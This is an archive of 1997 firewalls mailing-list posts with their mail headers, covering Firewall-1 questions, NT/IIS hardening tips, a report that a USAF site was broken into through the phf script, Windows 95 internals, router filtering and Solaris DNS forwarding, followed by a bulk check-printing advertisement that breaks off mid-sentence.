Separator _________________________________ Subject: Re: FW-1 throughput? Etc. Author: David Wee|INTERNET|David.Wee@singapore.sun.com at MCIMAIL Date: 1/8/97 12:33 AM > From David.Wee@Singapore Sun Jan 5 23:55:38 1997 > Date: Mon, 6 Jan 1997 15:53:50 +0800 > From: David.Wee@Singapore (David Wee) > To: julie.gupta@Corp > Subject: FW-1 throughput? Etc. > Cc: David.Wee@Singapore > > Julie, > > > Can you please help answer 1 & 2 > > > Regards,david > ----- Begin Included Message ----- > > From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997 > Date: Mon, 6 Jan 1997 15:46:44 -0800 > From: drexx@sunphil.mozcom.com (Dexter D. Laggui) > To: firewalls@greatcircle.com, dwee@Singapore > Subject: FW-1 throughput? Etc. > > Hello world, > > I would be very much obliged if anybody can please answer on this: > > 1] How many packets per second can the Solstice Firewall-1 2.1 > (installed in a Sun Sparcstation 20 with Solaris 2.5) > process ? In mbps terms? > 2] Current needs dictate for a solution involving FWs with multiple > secure VPNs to mobile customers. I like the capabilties of > FW-1 2.1 very much but I understand that it does not support VPN > today. Do I need the SunScreen to complement it? :-( > 3] Who do I talk to in Sun Singapore for FW and SunScreen training? > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > Thank you very much for your kindness. :-) > > Yours, > Dexter D. Laggui > Systems Engineer > > drexx@sunphil.mozcom.com > Philippine Systems Products Inc. > > > ----- End Included Message ----- > > From firewalls-owner Wed Jan 8 10:19:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04124 for firewalls-outgoing; Wed, 8 Jan 1997 09:38:46 -0800 (PST) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA04117 for ; Wed, 8 Jan 1997 09:38:37 -0800 (PST) Received: from wolverine (wolverine.acquion.com [206.154.17.12]) by magneto.acquion.com (post.office MTA v2.0 0813 ID# 0-11944) with SMTP id AAA299 for ; Wed, 8 Jan 1997 12:43:07 -0500 Message-Id: <2.2.32.19970108174025.00902258@mail.acqic.org> X-Sender: oolid@mail.acqic.org X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 08 Jan 1997 12:40:25 -0500 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Microsoft Rome? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone comment on what the "ms-rome 569/udp #microsoft rome" service is for? Regards, Joe, oolid@acqic.org From firewalls-owner Wed Jan 8 10:23:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02040 for firewalls-outgoing; Wed, 8 Jan 1997 08:59:18 -0800 (PST) Received: from www.steldyn.com (www.steldyn.com [198.68.45.121]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA02014 for ; Wed, 8 Jan 1997 08:59:01 -0800 (PST) Received: from juneau.steldyn.com (172.16.31.1) by www.steldyn.com (EMWAC SMTPRS 0.81) with SMTP id ; Wed, 08 Jan 1997 10:05:48 -0700 Received: by juneau.steldyn.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD4A.A17D20C0@juneau.steldyn.com>; Wed, 8 Jan 1997 09:59:26 -0700 Message-ID: From: Chris Pugrud To: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: RE: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 09:59:25 -0700 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This really as not as bad of a situation as it seems. Here are a few pointers to vastly increasing the security of the system. This is not the be all or end all of security. I am sure that there are more steps that you can take to increase your security even more. Buyer Beware. Your mileage may vary... Apply sp2 for Windows NT 4.0 SP2 fixes several bugs in the OS and IIS http://www.microsoft.com/ntserversupport/Default-SL.HTM The machine really should be used only for serving web pages. If you can dedicate a singular machine, even a 486, to just tossing HTTP then you can greatly increase the security. Under Control Panel > Services, Only the following MUST be running for a web server: EventLog FTP Publishing Service (optional) Plug and Play (NT 4.0) Workstation World Wide Web Publishing Service Only these services should be set "Automatic". All other services should be set "manual." Be careful, your mileage may vary... Use IIS security IIS has some built in allow/deny filtering based on IP address Internet Service Manager > WWW Service Properties > Advanced TAB CGI/BIN is BAD (by default) Remove scripts and the HTML Administrator if installed Internet Service Manager > Directories Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all others, especially any that you can not identify. While you are there make sure to go to "logging" and set up logs Also go c:\InetPub and set security NT Explorer > C:\InetPub > right click > properties > security > permissions Replace Permissions on Subdirectories Replace Permissions on Existing Files Make Everyone Read (RX)(RX) Make Administrator Full Control (All)(All) Remove all others This sets things up so that only the administrator can make changes and they must be made from the machine. Use the OS security NT 4.0 has basic packet filtering built in Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > Advanced > Enable Security > Configure Permit Only (TCP Ports) > Add > 80 (http) Permit Only (UDP Ports) > (leave blank) Permit Only (IP Protocols) > Add > 6 (TCP) This really cuts down what the machine can do. If you need to surf from the machine you may need to add 53 to UDP Ports. While you in the control panel, also check your bindings: Control Panel > Network > Bindings > Show Bindings for "all protocols." Make sure that "TCP/IP" is Enabled Disable all others Show bindings for "all adapters" Expand the adapter (click the plus box) Expand WINS Client You may need to Enable Workstation If the networking will not start on reboot If you do, make sure to disable server and NetBIOS Interface Restart your computer Good day and Good luck Chris >-----Original Message----- >From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil] >Sent: Wednesday, January 08, 1997 3:52 AM >To: Firewalls Mailing list >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > >I am responsible for securing (as well as I can) a DEC Alpha running >Windows NT 4.0 and Internet Information Server as our WWW Server. It is >sitting as a node on our LAN and everyone in the world can access it. I >want a program that I can run on it that will allow/disallow blocks of >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but >not as necessary) it to keep detailed logs. I have heard of O'Reiley's >WebSite, but I don't know if this will do. I do not have funding for an >expensive firewall machine, and it is impracticle to add routers into >our LAN. Please help if you have any suggestions. Thanks. > >albert.franke@ramstein.af.mil >Albert E. Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 From firewalls-owner Wed Jan 8 10:42:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04490 for firewalls-outgoing; Wed, 8 Jan 1997 09:46:23 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA04461 for ; Wed, 8 Jan 1997 09:46:07 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id MAA18010; Wed, 8 Jan 1997 12:42:50 -0500 From: Adam Shostack Message-Id: <199701081742.MAA18010@homeport.org> Subject: Re: USAF: how it was hacked In-Reply-To: <199701080554.AAA17354@news2.mnsinc.com> from matrix at "Jan 8, 97 00:51:01 am" To: smanning@mail1.mnsinc.com (matrix) Date: Wed, 8 Jan 1997 12:42:50 -0500 (EST) Cc: Firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure we can keep the rumors to a dull roar. Make an official statement about how it was done. Adam | Matthew Patton wrote... | > | > Really quite anticlimatic. The infamous phf script was left active on | > the server and was how they got in. Root, the whole 9 yards. | | Really? What are these statements based on? | | Could we please keep the rumors to a dull roar? Thanks! | | Stephen Manning, Special Agent | Computer Crime Investigator | Air Force Office of Special Investigations | Voice: (301) 981-5469 - Fax: (301) 981-3087 | -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Wed Jan 8 11:35:56 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09207 for firewalls-outgoing; Wed, 8 Jan 1997 11:02:24 -0800 (PST) Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA09191 for ; Wed, 8 Jan 1997 11:02:09 -0800 (PST) Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.7.6/8.6.9) with SMTP id KAA29068; Wed, 8 Jan 1997 10:58:41 -0800 (PST) Date: Wed, 8 Jan 1997 10:56:30 -0800 (PST) From: Michael Baumann To: Ken Barlow cc: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike" Subject: Re: Pointcast In-Reply-To: <2D3B3AC0.@acccorp.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 8 Jan 1997, Ken Barlow wrote: > I find it's one of those subjects that costs alot and > produces _no_ benefit for the company. > And there is the rub. It produces *no* benefit to the company. It (ab)uses bandwidth. I had no problem at all with management when I suggested we configure our proxy to deny access to the pointcast network. Just say no. > > ______________________________ Reply Separator _________________________________ > Subject: Pointcast > Author: "Starkweather; Mike" at Internet > Date: 1/7/97 1:29 PM > > > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. > > If this is the wrong place for this question please redirect me. > > Mike Starkweather > Anheuser-Busch > -- Michael Baumann Optivus Technology Inc.|Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Wed Jan 8 11:40:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08736 for firewalls-outgoing; Wed, 8 Jan 1997 10:54:41 -0800 (PST) Received: from atzhcd3.gordon.army.mil (atzhcd3.gordon.army.mil [147.51.83.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08672 for ; Wed, 8 Jan 1997 10:54:00 -0800 (PST) Received: by atzhcd3.gordon.army.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD6B.32083FB0@atzhcd3.gordon.army.mil>; Wed, 8 Jan 1997 13:52:32 -0500 Message-ID: From: Thomas Duke To: "'Firewalls@GreatCircle.COM'" Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 13:52:31 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The military like any other organization has to realized they must pay for the skill sets necessary to perform these tasks. The majority a people that do these things are not skilled....and won't be until the military/gov figures out how to reward/pay IS professionals creatively like the military doctors/dentists. Why would I want to stay in the gov/mil business getting 1/2 my value? >---------- >From: A. Omer Koker[SMTP:omer@superonline.net] >Sent: Wednesday, January 08, 1997 7:50 AM >To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton' >Subject: RE: USAF: how it was hacked > >Interestingly enough this specific hole was described in detail on the >latest 2600mag. >now you know they will start reading it... > >>---------- >>From: Matthew Patton[SMTP:patton@sysnet.net] >>Sent: 08 Ocak 1997 Cartamba 01:09 >>To: Firewalls@GreatCircle.COM >>Subject: USAF: how it was hacked >> >>No, this isn't about cdrom based web content. >> >>Really quite anticlimatic. The infamous phf script was left active on >>the server and was how they got in. Root, the whole 9 yards. >> >>What's really funny is that no more than a week prior to the incident, I >>suggested to ASSIST (the military's equiv of CERT, and now financial >>sponsor of same) that in light of the minor poking around I did on a >>handful of military web sites, that they needed to get the word out to >>admins because so many servers were in a high state of misconfiguration >>and just waiting to be exploited. 7 days later, boom!! >> >>I'm not sure on what grounds people place so much trust in the military >>to do things right with respect to host and network security. I'm sure >>there are segments that do a damn fine job, but seeing the abject lack of >>skills and knowledge in the Pentagon area makes me a mite bit skeptical >>and not a little ashamed. It's a wonder we don't see high profile >>exploits on a routine basis. Don't get me wrong, the private sector >>doesn't have their act together on many fronts as well. >> >>Now hopefully the thread can die in peace. >> > From firewalls-owner Wed Jan 8 12:55:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14270 for firewalls-outgoing; Wed, 8 Jan 1997 12:19:47 -0800 (PST) Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA14178 for ; Wed, 8 Jan 1997 12:19:14 -0800 (PST) Received: by kotuku.manukau.govt.nz id <35722>; Thu, 9 Jan 1997 09:30:34 +1300 Message-Id: <97Jan9.093034nzdt.35722@kotuku.manukau.govt.nz> From: Matthew Thompson To: "'Firewalls (inet/GreatCircle)'" , "'Sebastian Stache'" Cc: "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: RE: Re: NCSA != NCSC Date: Fri, 10 Jan 1997 11:13:28 +1300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sebastian Stache[SMTP:zeb@sbbs.se] Wrote: >Wilner informed me that: >> Everything except boot-up depends upon the O/S. Nothing is below the "O/S >> layer," nor does one speak of such a layer unless one intends "application >as well as >> layer" and doesn't know an application from an O/S, nor can a single byte be >> sent or retrieved over a device (networked or otherwise) unless an O/S is >> relied upon, nor can a single access to memory, disk, or what-have-you be ... >Now suppose I wanted to use Drivespace, an MS technique to >compress harddisks on the fly. Or even better, Stacker, a 3rd- >party equivalent. Either of these would install themselves >BELOW Windows 95 (and even more interestingly, in some respects >even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). >To Windows 95 (and to DOS), the compression activities would >be transparent, ie Windows would not *know* about them. Which >of course is the whole point. Bzzzst. Wrong. When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. Here I'm talking about the DOS it uses to boostrap the machine, load all "real mode" device drivers etc, not user started DOS sessions (which also run in separate x86 virtual machines). It heavily breakpoints this DOS code, and in fact will recieve control back from DOS (without the DOS code's knowledge) at points it has determined it needs to, it will also catch many int calls to the BIOS and handle them in protected mode without "Real Mode DOS's" knowledge. The BIOS and DOS isn't used for a hell of a lot any more (at least once '95 boots), not for Disk (unless no protected mode disk driver exists for the device), Screen, Keyboard, or Serial port I/O, and that's most of the BIOS. All these functions are handled by 32 bit protected mode device drivers which go straight to the hardware, and in almost all cases around DOS and the BIOS. There are exceptions to this, where Win95 has no protected mode driver for the device, it will use DOS and loaded device drivers effectively as the "device driver" to access the device. And calls to this "device driver" can end up back in the Win95 OS. Use of real mode DOS drivers is a choice, for backward compatibility, a choice you don't for example have with NT. However anyone who wants to set up Win95 for speed and stability will avoid real mode drivers like the plauge. With Win95, running the GUI is a choice, much like firing up X11 on top of Unix is, you can still have premptively multitasked character mode sessions if you want to. >I don't think there's any point in mentioning utilities that >halt the computer when a virus is detected, or when battery >status is low, or when the Debug-mode button is pressed, or >when a source-routed packet arrives. Well, under '95 these should (and are by all leading players) be implemented as 32 bit virtual device drivers. and a source routed packet is not going to get far on any OS without going thru the TCP/IP stack, which admittedly could be a real mode stack on 95, but that's not the sensible choice. Win311 is an operating system, it offers preemptive multitasking, virtual memory, and controls file system and most I/O devices. It has more in common with Win95 architecturally than one (particularly if that one is in Bill Gates' marketing dept.) may wish to think. The common misconception, that windows 3.11 only offers cooperative multitasking stems from the fact that all Win16 apps are cooperatively multitasked within the same virtual machine and same address space, and all most users see is the cooperatively multitasking face fo Win3.11, underneath, it's 32 bit, premptive multitasking for virtual machines. This decision (UGH!) transfers forward to Win95 as well, which is why those wanting good stable Win95 performance avoid 16 bit apps like the plauge as well. WinNT of course can run each 16 bit app in it's own virtual machine (or a shared one if you choose). Win95 is full of hacks and kludges, but for good reason, BACKWARD COMPATIBILITY. Users would have squawked long and loud about how "bad" or "incompatible" etc that Win95 was if all their 16 bit apps stopped running, and they could no longer use their WeeLee4000 CD-ROM drive, or EastClone9000 SCSI adapter just because no-one had written a protected mode driver for it yet. You want a Microsoft OS without so many backward compatability compromises?, Get off 95 and onto NT. Cheers, Matthew. --------------------------------------------------------------------- Kiwitech Marine Solutions Ltd. RaceTech, SailTech, PowerTech, Marine Software & Hardware Web: http://www.kiwitech.co.nz, Email: mthomps1@kiwitech.co.nz Phone: +64-9-307-0819 Fax: +64-9-307-6685 Mobile: +64-21-998-600 PO Box 5909, Wellesley Street, Auckland, New Zealand From firewalls-owner Wed Jan 8 14:19:16 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA21467 for firewalls-outgoing; Wed, 8 Jan 1997 13:41:23 -0800 (PST) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id NAA21455 for ; Wed, 8 Jan 1997 13:41:11 -0800 (PST) Received: from kcann.taylormade.com (kcann.taylormade.com [205.226.160.70]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id NAA17764; Wed, 8 Jan 1997 13:40:36 -0800 (PST) Message-ID: <32D412C5.42A2@ins.com> Date: Wed, 08 Jan 1997 13:33:57 -0800 From: Kevin Cann Reply-To: kevin_cann@INS.COM Organization: ins.com. X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: uscny8hb@ibmmail.com CC: Firewalls@GreatCircle.COM Subject: Re: internal filtering router - filter config? References: <199701080648.WAA21235@miles.greatcircle.com> <32D3A3BF.5D36@dreamscape.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Simply use the 'no ip source route' global router command. Steven E. Matkoski wrote: > > Firewalls-Digest wrote: > > > > In your external router you'd block any ICMP traffic going back and > > forth, as well as any packets bearing one of your internal IP addresses, > > as a source address, especially if these are going INTO your protected > > network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill > > any ports that your users will not be using, andl leave just mail, web, > > ftp, etc. > > > > ricardo > > ralvarado@avantel.com.mx > > > Thanks, I also read that you could block source-routed packets there, > also. > If I am using a cisco router, how does on go about this? or can I get a > location for documentation. > > Thanks! > -steve. > matkoski@dreamscape.com -- _____________________________________________________________ Kevin K. Cann International Network Services Network Systems Consultant 111 Deerwood Road #200 Pager: 1-888-587-3119 San Ramon, CA 94583 (510) 831-4743 "PROVIDING THE POWER OF OPERABLE NETWORKS" _____________________________________________________________ From firewalls-owner Wed Jan 8 15:30:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27086 for firewalls-outgoing; Wed, 8 Jan 1997 15:15:17 -0800 (PST) Received: from gamma.wantech.se (gamma.wantech.se [193.44.131.30]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id PAA27050 for ; Wed, 8 Jan 1997 15:15:02 -0800 (PST) Received: (qmail 2682 invoked by uid 503); 8 Jan 1997 23:14:37 -0000 Date: Thu, 9 Jan 1997 00:14:36 +0100 (MET) From: Patrik Backstrom X-Sender: pb@gamma.wantech.se To: firewalls@greatcircle.com Subject: Guardian 2.0 NAT on NT 4.0 troubles Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everyone! I havn't found a FAQ on the Guardian anywhere... is there one? Anyway - I have installed Guardian Firewall 2.0 on a NT 4.0 machine, works fine. But when i install the Guardian NAT on top of it, it suddenly refuses to let *any* traffic through the firewall. It doesn't matter what rules i add to either the Firewall or the NAT, it still refuses any traffic. It's running on a Windows NT 4.0 Pentium machine, Service pack 1 & 2 installed, equiped with two 3COM 3C900 PCI 10MBit Ethernet cards. Am i missing something, that is obvious to everyone else? :-) Hope somebody can help me with this... /pb --------------------------------------------------------- Patrik B=E4ckstr=F6m Phone.....: +46-(0)707-881928 Timgatan 3 Homepage..: http://www.klingon.pp.se 415 08 G=F6teborg E-Mail....: pb@techno.org Finger pb@techno.org for my PGP Public Key --------------------------------------------------------- From firewalls-owner Wed Jan 8 17:59:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08403 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:36 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08381 for ; Wed, 8 Jan 1997 17:42:12 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id ra138311 for ; Thu, 9 Jan 1997 02:41:46 +0100 Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.54867FF0@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:26 +0100 Message-ID: <01BBFDD6.54867FF0@ppp49.sbbs.se> From: Sebastian Stache To: "'Matthew Thompson'" Cc: "'Firewalls (inet/GreatCircle)'" Subject: RE: Re: NCSA != NCSC Date: Thu, 9 Jan 1997 02:39:18 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Thompson wrote: >With Win95, running the GUI is a choice, much like firing up X11 on top of >Unix is, you can still have premptively multitasked character mode sessions >if you want to. If you refer to Explorer.exe as the GUI, I agree, it's much like X-Window. Windows 95 is however NOT much like X-Window, since it provides almost every kind of functionality you'd expect from an operating system. X-Window is little more than a shell. Win95 provides disk cache, long filenames, pipes, mailslots, RPC, network services and much more. To demonstrate this point, go to your nearest Win95 box and edit SYSTEM.INI. Replace this line Shell=Explorer.exe with Shell=Command.com Now when you start Windows, you'll have the equivalent (hrm, well) of a Borne shell, with multi-tasking and all. Care to try X-Window? Type "explorer". (I don't really think it matches neither Borne nor X-Window ). From firewalls-owner Wed Jan 8 17:59:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08402 for firewalls-outgoing; Wed, 8 Jan 1997 17:42:32 -0800 (PST) Received: from ns.sbbs.se (ns.sbbs.se [194.16.248.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08376 for ; Wed, 8 Jan 1997 17:42:02 -0800 (PST) Received: from ns.sbbs.se by ns.sbbs.se (NTMail 3.02.09) with ESMTP id na138307 for ; Thu, 9 Jan 1997 02:41:43 +0100 Received: by ppp49.sbbs.se with Microsoft Mail id <01BBFDD6.5258CA80@ppp49.sbbs.se>; Thu, 9 Jan 1997 02:39:22 +0100 Message-ID: <01BBFDD6.5258CA80@ppp49.sbbs.se> From: Sebastian Stache To: "'Matthew Thompson'" Cc: "'Firewalls (inet/GreatCircle)'" , "'Wilner@DOCKMASTER.NCSC.MIL'" , "'proberts@clark.net'" Subject: RE: Re: NCSA != NCSC Date: Thu, 9 Jan 1997 02:21:51 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Thompson wrote: >>Sebastian Stache[SMTP:zeb@sbbs.se] Wrote: >>Now suppose I wanted to use Drivespace, an MS technique to >>compress harddisks on the fly. Or even better, Stacker, a 3rd- >>party equivalent. Either of these would install themselves >>BELOW Windows 95 (and even more interestingly, in some respects >>even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). >>To Windows 95 (and to DOS), the compression activities would >>be transparent, ie Windows would not *know* about them. Which >>of course is the whole point. >Bzzzst. Wrong. >When Win95 runs the "Real Mode DOS" it runs it in an x86 virtual machine. >Here I'm talking about the DOS it uses to boostrap the machine, load all >"real mode" device drivers etc, not user started DOS sessions (which also >run in separate x86 virtual machines). It heavily breakpoints this DOS >code, and in fact will recieve control back from DOS (without the DOS >code's knowledge) at points it has determined it needs to, it will also >catch many int calls to the BIOS and handle them in protected mode without >"Real Mode DOS's" knowledge. A few facts, if I may. Real mode can never be "run in an x86 virtual machine". If the expression had been symentically correct, it would be have been contradictive . When "Real Mode DOS" is running, the processor is in real mode. When a DOS-box is run under Win95, the processor is in protected mode, with the VM (Virtual Mode) flag set. HIMEM.SYS can be used to switch to protected mode in a controlled and cooperative manner. HIMEM.SYS is automatically loaded by the Win95 version of IO.SYS unless explicitly told not to. Neither Drivespace nor Stacker are device drivers. The device driver for IDE devices resides in BIOS in modern (post -88) PCs. Both Drivespace and Stacker use a DOS extension technique to create new "virtual" devices with their own drive letters. The technique is exactly the same as MSCDEX and SUBST use. It is also exactly the same technique that is used by NET USE and Netware MAP. In all of the above cases, we are creating file components which are treated as black boxes by Windows, the operating system. If I wanted to write my own version of NET.EXE, I would probably see to that whenever a file containing the text "source routed packet" was requested to be stored on the remote host, I would triple-DES it. And Windows would not ever SEE this, since this functionality existed BELOW the operating system (Windows). >Bzzzst. Wrong. Wrong? Which word? From firewalls-owner Wed Jan 8 18:30:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA08765 for firewalls-outgoing; Wed, 8 Jan 1997 17:50:21 -0800 (PST) Received: from wanggate (wanggate.wang.co.nz [192.58.229.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA08752 for ; Wed, 8 Jan 1997 17:50:09 -0800 (PST) Received: by wanggate (951211.SGI.8.6.12.PATCH1042/951211.SGI) for id OAA23893; Thu, 9 Jan 1997 14:49:28 +1300 Received: from wnx1(172.17.28.6) by wanggate via smap (3.1) id xma023877; Thu, 9 Jan 97 14:49:04 +1300 Received: by WNX1 with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57) id <01BBFE3C.55BA34A0@WNX1>; Thu, 9 Jan 1997 14:49:37 +1300 Message-ID: From: Mahesh Ravji To: "'Firewalls@GreatCircle.COM'" Subject: DNS forwarding to firewall Date: Thu, 9 Jan 1997 14:49:35 +1300 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.57 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm having problems getting Sun's in.named to forward requests to our firewall. We have a Bordaware firewall and multiple secondary DNS located at various sites. All secondary DNS's are running Solaris 2.5 and need to be configured to forward queries it can't resolve to the firewall. I have added the 'forwarders' directive to the named.boot file which looks something like this: ; named boot file for secondary server ; directory /var/named ; type domain source host/file backup file cache . named.ca forwarders a.b.16.8 slave primary . db.. secondary some.domain a.b.64.227 db.some.domain secondary b.a.IN-ADDR.ARPA a.b.64.227 db.a.b primary 0.0.127.IN-ADDR.ARPA db.127.0.0 The DNS resolves all internal requests but does not appear to forward names that it can't resolve to the firewall. Has anyone else configured a similar setup in a Solaris environment? TIA Mahesh Ravji Phone: +64 4 382-0100 Wang NZ Ltd. Fax: +64 4 385-6067 195-201 Willis Street E-Mail: Mahesh.Ravji@wang.co.nz PO Box 6648 Wellington New Zealand From firewalls-owner Wed Jan 8 18:45:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA10212 for firewalls-outgoing; Wed, 8 Jan 1997 18:15:34 -0800 (PST) Received: from mtigwc02.worldnet.att.net (mailhost.worldnet.att.net [204.127.129.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10195; Wed, 8 Jan 1997 18:15:04 -0800 (PST) Received: from Default ([153.35.0.194]) by mtigwc02.worldnet.att.net (post.office MTA v2.0 0613 ) with SMTP id AAD20151; Thu, 9 Jan 1997 00:33:40 +0000 From: printerm@softcell.net Date: Wed, 08 Jan 1997 19:36:59 PST Subject: CheckRite Laser Checks! (B) Message-ID: <19970109003156.AAD20151@Default> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The (B) means"bulk class mail", we put that there so you will be able to tell that you have a bulk mail without having to open it. We also put that there so you can filter us out if you wish. Please put REMOVE in the subject and press reply if you do not wish to receive mail from us again. CheckRite 2000 by Printerm MICR LASER CHECK PRINTING The fast approach to convert from Pre-printed checks to laser check printing DOWNLOAD FREE DEMO SOFTWARE FROM OUR WEB SITE http://bisinc.com/printerm/ Conversion from costly pre-printed checks to lower cost laser technology may save you as much as 8 cents per check. Printerm offers you a software package which allows a smooth link-up between your Accounting Software and your Laser Printer. Laser printing eliminates costly outside check form printing bills and allows the use of blank paper stock. Laser check printing means you will not have to contend with stocking large quantities of pre-printed checks which can become obsolete because of address changes, company name and changes in financial institutions. Printerm offers a full digitizing service to convert forms, logos and authorized signatures to digital data. These digitized items may be used on your mainframe computers or if you are using a HP LaserJet 4Plus, 4Si, 5 or 5Si printers they may be stored on a font cartridge or a flash simm. The font cartridge for the HP 4 series is simple to plug into the printer when check printing is required. The flash simm has to be mounted onto the MIO board in the HP LJ 5 and 5Si printers. HP Flash Cartridges and simms are programmed by Printerm with your check data and can assist you with your conversion program. FlashProm or simm products are available in various sizes from 256K up to 2MB. These products are reprogrammable to allow updating of data and can store forms, logos and authorized signatures for several different companies. Flash technology data storage allows your printer to print at maximum speed since there is no spooling delay of large files from your computer to the printer. You are able to print checks for several different companies with laser printing without experiencing delays caused by changing check stock. The MICR font provided by printerm is to ABA-X9 standards to ensure acceptance of your checks by banking institutions. Security is easy with Printerm's approach to laser printing. Pre-printed blank checks which may be lost or stolen are no longer required. The HP FlashProm cartridge (used to store check forms, signatures and logos) and the MICR (Magnetic Ink) toner cartridge are easily removed and stored in a secure area preventing un-authorized use when check printing is not required. The CheckRite 2000 package available from Printerm provides that essential back-up between your accounting software and the laser 